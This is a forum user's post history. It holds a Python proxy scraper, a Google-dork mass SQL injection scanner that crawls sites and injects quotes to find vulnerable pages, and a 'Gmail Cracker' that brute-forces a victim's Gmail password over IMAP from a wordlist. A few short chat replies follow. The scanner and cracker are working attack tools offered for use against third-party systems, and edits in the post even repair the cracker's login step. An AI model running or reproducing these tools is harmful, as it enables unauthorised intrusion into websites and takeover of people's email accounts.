
Romania-

Members
  • Posts: 42
  • Joined
  • Last visited

Everything posted by Romania-

  1. # Python 2.7.7 HTTP Proxy Scraper
     import urllib2
     from urllib2 import urlopen
     from BeautifulSoup import BeautifulSoup
     from random import randint

     dots = '.' * 80  # separator line
     print 'Python 2.7.7'
     print ' Welcome to Python Proxy Scraper'
     print ' Type "Help" for Help'
     print ' 14 User-Agent Edition'
     print dots

     cL = ['view user agents', 'help', 'credits', 'command list', 'start']
     userAgents = [
         'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
         'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
         'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)',
         'Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)',
         'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061026 BonEcho/2.0',
         'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.12pre) Gecko/20080103 BonEcho/2.0.0.12pre',
         'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.9) Gecko/20071113 BonEcho/2.0.0.9',
         'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)',
         'Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)',
         'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Acoo Browser; InfoPath.2; .NET CLR 2.0.50727; Alexa Toolbar)',
         'Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02',
         'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14',
         'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
         'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)',
         'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; TheWorld)',
     ]
     mainUrl = 'http://free-proxy-list.net/'  # Target web page.
     mainLoop = True
     searchLoop = False

     while mainLoop:
         userInput = raw_input('<>< ')
         if userInput == cL[0]:  # view user agents
             print dots
             for x in range(len(userAgents)):
                 print x, userAgents[x]
             print dots
         elif userInput == cL[1]:  # help
             print '<>< Version 1.0'
             print '<>< Compatible with Python 2.7.7; may be unstable on other versions.'
             print '<>< Type "command list" for a list of commands.'
             print '<>< Feel free to edit/tweak my script; give credit where due if you repost.'
             print dots
             print '<>< You may need to tweak some variables in the code to get this working.'
             print '<>< Default target: http://free-proxy-list.net.'
             print '<>< This script scrapes proxies from mainUrl.'
             print '<>< It uses BeautifulSoup to isolate the table containing the proxies and ports,'
             print '<>< then strips unwanted characters and prints a nicely formatted list of proxies.'
             print dots
         elif userInput == cL[2]:  # credits
             print '<>< Kopuz 2014'
             print '<>< Feel free to edit/tweak my script; give credit where due if you repost.'
             print dots
         elif userInput == cL[3]:  # command list
             print dots
             print cL
             print dots
         elif userInput == cL[4]:  # start
             searchLoop = True
             while searchLoop:
                 try:
                     agentSelect = randint(0, len(userAgents) - 1)
                     webReq = urllib2.Request(mainUrl)
                     print '<>< Starting Proxy Scrape At ' + mainUrl
                     webReq.add_unredirected_header('User-Agent', userAgents[agentSelect])
                     print '<>< Agent: ' + userAgents[agentSelect]
                     thePage = urlopen(webReq)
                     theText = thePage.read()
                     print '<>< Raw data gathered, would you like to sort and view? y/n'
                     userInput = raw_input('<>< ')
                     if userInput == 'y':
                         soup = BeautifulSoup(theText)
                         rawProx = soup.find('tbody')    # The <tbody> holds the proxy table.
                         tableD = rawProx.findAll('td')  # Individual table cells.
                         # The table has 8 columns, so an IP sits in every 8th
                         # cell and its port in the cell right after it.
                         for x in xrange(0, len(tableD) - 1, 8):
                             ip = tableD[x].string
                             port = tableD[x + 1].string
                             print '%s:%s' % (ip, port)
                         searchLoop = False
                     elif userInput == 'n':
                         searchLoop = False
                 except Exception:
                     continue
         else:
             print '<>< Unknown Command'
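     Python 2.7 and the old BeautifulSoup 3 package are both end-of-life, so here is a minimal sketch of the same table-stride idea in Python 3. It assumes the third-party requests and beautifulsoup4 packages and that free-proxy-list.net still serves an 8-column table; treat it as an illustration, not a drop-in replacement.

     # Python 3 sketch of the same scrape, assuming `requests` and
     # `beautifulsoup4` are installed and the target still uses an
     # 8-column table with IP in one cell and port in the next.
     import requests
     from bs4 import BeautifulSoup

     resp = requests.get('http://free-proxy-list.net/',
                         headers={'User-Agent': 'Mozilla/5.0'}, timeout=10)
     soup = BeautifulSoup(resp.text, 'html.parser')
     cells = soup.find('tbody').find_all('td')

     # An IP sits in every 8th cell; its port is in the cell after it.
     for i in range(0, len(cells) - 1, 8):
         print('%s:%s' % (cells[i].get_text(strip=True),
                          cells[i + 1].get_text(strip=True)))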
  2. #!/usr/bin/python
     # -*- coding: cp1254 -*-
     import re
     import urllib2
     import urlparse
     import mechanize
     import webbrowser
     import random
     import threading
     import colorama
     colorama.init()

     print """
     Google Dork Scanner V 0.2
     Contact : b3mb4m@gmail.com
     https://github.com/b3mb4m
     Video Link : http://www.youtube.com/watch?v=LzX7rt0hdrg
     """
     print ""
     dork = raw_input("Dork : ")
     print ""

     appurls = []  # hostnames pulled from the Google results
     b3mb4m = []   # final target URLs to test
     useragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
                  'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
                  'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
                  'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
                  'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
                  'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
                  'Microsoft Internet Explorer/4.0b1 (Windows 95)',
                  'Opera/8.00 (Windows NT 5.1; U; en)',
                  'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
                  'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
                  'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
                  'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
                  'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
     agents = random.choice(useragent)
     uagent = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)'}

     # Domains to skip in the search results.
     blacklist = ('google', 'youtube', 'vimeo', 'facebook', 'pastebin',
                  'zone-h', '4shared', 'fulldownloadshare', 'rapidsharemix',
                  'ethicalhackx', 'systemanforderungen',
                  'gamesystemrequirements', 'gepigeny')

     def collecturls():
         br = mechanize.Browser()
         br.set_handle_robots(False)
         br.addheaders = [('User-agent', agents)]
         found = []
         page = ["0"]  # Result offsets; add more if you want more pages.
         for i in page:
             try:
                 google = "https://www.google.com/search?num=10&q=" + dork + "&start=" + i
                 htmltext = br.open(google).read()
                 # Grep the result links out of the raw HTML.
                 pattern = re.compile("<h3 class=\"r\"><a href=\"/url\?q=(.*?)&amp.*?\">.*?</a></h3>")
                 found += re.findall(pattern, htmltext)
                 print "\n[+] URL Search " + i
             except:
                 pass
         for i in found:
             if any(bad in i for bad in blacklist):
                 continue
             appurls.append(urlparse.urlparse(i).netloc)
         for i in set(appurls):
             if i.startswith("http://"):
                 i = i.replace("http://", "")
                 print "\n\tI fixed link ", i
             elif i.startswith("https://"):
                 i = i.replace("https://", "")
                 print "\n\tI fixed link ", i
             # Look up every site hosted on the same IP.
             urlqeqe = "http://viewdns.info/reverseip/?host=%s&t=1" % i
             req = urllib2.Request(urlqeqe, headers=uagent)
             data = urllib2.urlopen(req).read()
             baglantilar = re.findall("<tr><td>\S+</td><td", data)  # 'baglantilar' = links
             for i in baglantilar:
                 i = i.replace("<tr><td>", "").replace("</td><td", "")
                 if not i.startswith("http://"):
                     i = "http://" + i
                 if "Domain" not in i:
                     b3mb4m.append(i)

     # Error strings that mark a response as likely injectable.
     errors = ("Query failed",
               "supplied argument is not a valid MySQL result resource in",
               "You have an error in your SQL syntax", "ORDER BY",
               "mysql_num_rows()", "SQL query failed",
               "Microsoft JET Database Engine error '80040e14'",
               "Microsoft OLE DB Provider for Oracle", "Error:unknown",
               "Fatal error", "mysql_fetch", "Syntax error",
               "error in your SQL syntax")

     def sqltest():
         print " \n Targets Loading \n "
         for url in set(b3mb4m):
             print url
         for url in set(b3mb4m):
             print "[+] Target " + url
             tarayici = mechanize.Browser()  # 'tarayici' = browser
             tarayici.set_handle_robots(False)
             tarayici.addheaders = [('User-agent', agents)]
             urls = [url]  # crawl queue
             gez = [url]   # 'gez' = pages already seen
             sayma = 0     # 'sayma' = page counter; stop after 100
             try:
                 while len(urls) > 0:
                     try:
                         tarayici.open(urls[0])
                         urls.pop(0)
                         try:
                             for link in tarayici.links():
                                 yeniurl = urlparse.urljoin(link.base_url, link.url)
                                 if yeniurl not in gez and url in yeniurl:
                                     gez.append(yeniurl)
                                     urls.append(yeniurl)
                                     sayma += 1
                                     if sayma == 100:
                                         urls = []
                                         break
                                     # Inject a quote at the likeliest spot.
                                     if "=" in yeniurl:
                                         yeniurl = yeniurl.replace("=", "='")
                                         print colorama.Fore.RED + "[+] Value Found " + yeniurl
                                     elif ".html" in yeniurl:
                                         yeniurl = yeniurl.replace(".html", "'.html")
                                         print colorama.Fore.MAGENTA + "[+] Value Found " + yeniurl
                                     else:
                                         yeniurl = yeniurl + "'"
                                     try:
                                         req = urllib2.Request(yeniurl, headers=uagent)
                                         data = urllib2.urlopen(req).read()
                                         if any(e in data for e in errors):
                                             print "--> " + yeniurl
                                             webbrowser.open(yeniurl)
                                             urls = []
                                             break
                                     except:
                                         pass
                         except:
                             break
                     except:
                         if urls:
                             urls.pop(0)
             except:
                 pass

     # sqltest needs collecturls' results, so run them one after the other
     # (the original called Thread.run(), which executes in this thread anyway).
     collecturls = threading.Thread(name='collecturls', target=collecturls)
     sqltest = threading.Thread(name='sqltest', target=sqltest)
     collecturls.run()
     sqltest.run()
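     The host-normalization step in collecturls is the part most worth keeping; the Google-scraping regex above stopped matching long ago. A minimal Python 3 sketch of the same dedup-by-hostname logic, using only the standard library (the sample URLs are hypothetical):

     # Python 3 sketch of collecturls' normalization step: pull each URL's
     # hostname, skip blacklisted domains, deduplicate with a set.
     from urllib.parse import urlparse

     blacklist = ('google', 'youtube', 'facebook', 'pastebin')
     found = ['http://example.com/page?id=1',          # hypothetical inputs
              'https://www.youtube.com/watch?v=x']

     hosts = {urlparse(u).netloc for u in found
              if not any(bad in u for bad in blacklist)}
     print(hosts)  # {'example.com'}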
  3. #!/usr/bin/python
     # -*- coding: utf-8 -*-
     # Gmail Cracker V 1 Priv8 By Mauritania Attacker
     # This program is for educational purposes only.
     # The script only needs the Python 2 standard library (sys, imaplib, time);
     # no extra modules are required.
     # If you need a good wordlist ====> http://pastebin.com/ZGGNM8SM or make yours
     import sys, imaplib, time

     log = "GmailGhost.log"
     logfile = open(log, "a")  # renamed from 'file', which shadowed the builtin
     counter = 0
     face = '''
     :::Gmail Cracker v 1:::
     +=======================================+
     |..........Gmail Cracker v 1...........|
     +---------------------------------------+
     | Author : Mauritania Attacker          |
     | Use At your Own Risk                  |
     | Contact : No Need                     |
     | This tool is made for pentesting.     |
     | Do not use this tool on any account   |
     | without permission of the account     |
     | holder.                               |
     | We take no responsibility for the     |
     | use of this program.                  |
     +---------------------------------------+
     '''
     help = '''
     Usage : ./gmail.py -u [email] -w [wordlist]
     Example : ./gmail.py -u victim@gmail.com -w wordlist.txt
     '''

     for arg in sys.argv:
         if arg.lower() in ('-u', '--user'):
             email = sys.argv[sys.argv.index(arg) + 1]
         elif arg.lower() in ('-w', '--wordlist'):
             wordlist = sys.argv[sys.argv.index(arg) + 1]
         elif arg.lower() in ('-h', '--help'):
             print face
             print help
             logfile.write(face)
             logfile.write(help)
             sys.exit(0)

     # Change these if needed.
     HOST = 'imap.gmail.com'
     PORT = 993

     try:
         words = [w.strip() for w in open(wordlist, "r").readlines()]
     except IOError:
         print "\n[-] Error: Check your wordlist path\n"
         logfile.write("\n[-] Error: Check your wordlist path\n")
         sys.exit(1)

     def definer():
         print "-" * 60
         print "[+] Email : %s" % email
         print "[+] Wordlist : %s" % wordlist
         print "[+] Length wordlist : %s" % len(words)
         print "[+] Time Starting : %s" % time.strftime("%X")
         print "-" * 60
         logfile.write("\n[+] Email : %s" % email)
         logfile.write("\n[+] Wordlist : %s" % wordlist)
         logfile.write("\n[+] Length wordlist : %s" % len(words))
         logfile.write("\n[+] Time Starting : %s" % time.strftime("%X"))

     def main(password):
         global counter
         sys.stdout.write("[-] Trying : %s \n" % password)
         sys.stdout.flush()
         logfile.write("[-] Trying : %s \n" % password)
         try:
             # The original called nonexistent IMAP4.Email()/Passwd() methods;
             # imaplib authenticates with login().
             conn = imaplib.IMAP4_SSL(HOST, PORT)
             conn.login(email, password)
             conn.logout()
             print "[+] enjoy !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Found!" % (email, password)
             logfile.write("[+] enjoy !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Found!" % (email, password))
             sys.exit(1)
         except KeyboardInterrupt:
             print "\n[-] Aborting...\n"
             logfile.write("\n[-] Aborting...\n")
             sys.exit(1)
         except Exception:
             pass
         counter += 1
         if counter == len(words) / 5:
             print "[+] Gmailcracker 20% done..."
             print "[+] Please be patient..."
             logfile.write("[+] Gmailcracker 20% done...\n")
             logfile.write("[+] Please be patient...\n")
         elif counter == len(words) / 4:
             print "[+] Gmailcracker 25% done..."
             print "[+] Please be patient..."
             logfile.write("[+] Gmailcracker 25% done...\n")
             logfile.write("[+] Please be patient...\n")
         elif counter == len(words) / 2:
             print "[+] Gmailcracker 50% done..."
             print "[+] Please be patient..."
             logfile.write("[+] Gmailcracker 50% done...\n")
             logfile.write("[+] Please be patient...\n")
         elif counter == len(words):
             print "[+] Gmailcracker done...\n"
             logfile.write("[+] Gmailcracker done...!\n")

     if __name__ == '__main__':
         print face
         logfile.write(face)
         definer()
         for password in words:
             main(password)
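     The hand-rolled sys.argv walk above is fragile: a flag given as the last argument raises an IndexError, and the original wordlist index arithmetic was simply wrong. A short Python 3 sketch of the same -u/-w interface using the standard argparse module (flag names mirror the original script; the banner and cracking logic are omitted):

     # Python 3 sketch: argparse replaces the manual sys.argv walk.
     import argparse

     parser = argparse.ArgumentParser(description='wordlist runner')
     parser.add_argument('-u', '--user', required=True, help='target email')
     parser.add_argument('-w', '--wordlist', required=True, help='wordlist path')
     args = parser.parse_args()

     with open(args.wordlist) as fh:
         words = [line.strip() for line in fh]
     print('loaded %d candidate passwords for %s' % (len(words), args.user))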
  4. Yes, this is a scam.
  5. How do you earn credits?
  6. Hi, I'm Romania- and I found out about you from Google. For now I do programming (VB.NET, Ajax, JavaScript, HTML, PHP, C/C++ and a bit of Perl). Recently I also took up pentesting, learned how things work, and came here to learn some more.
  7. Dude, you didn't read the whole page; hit F5.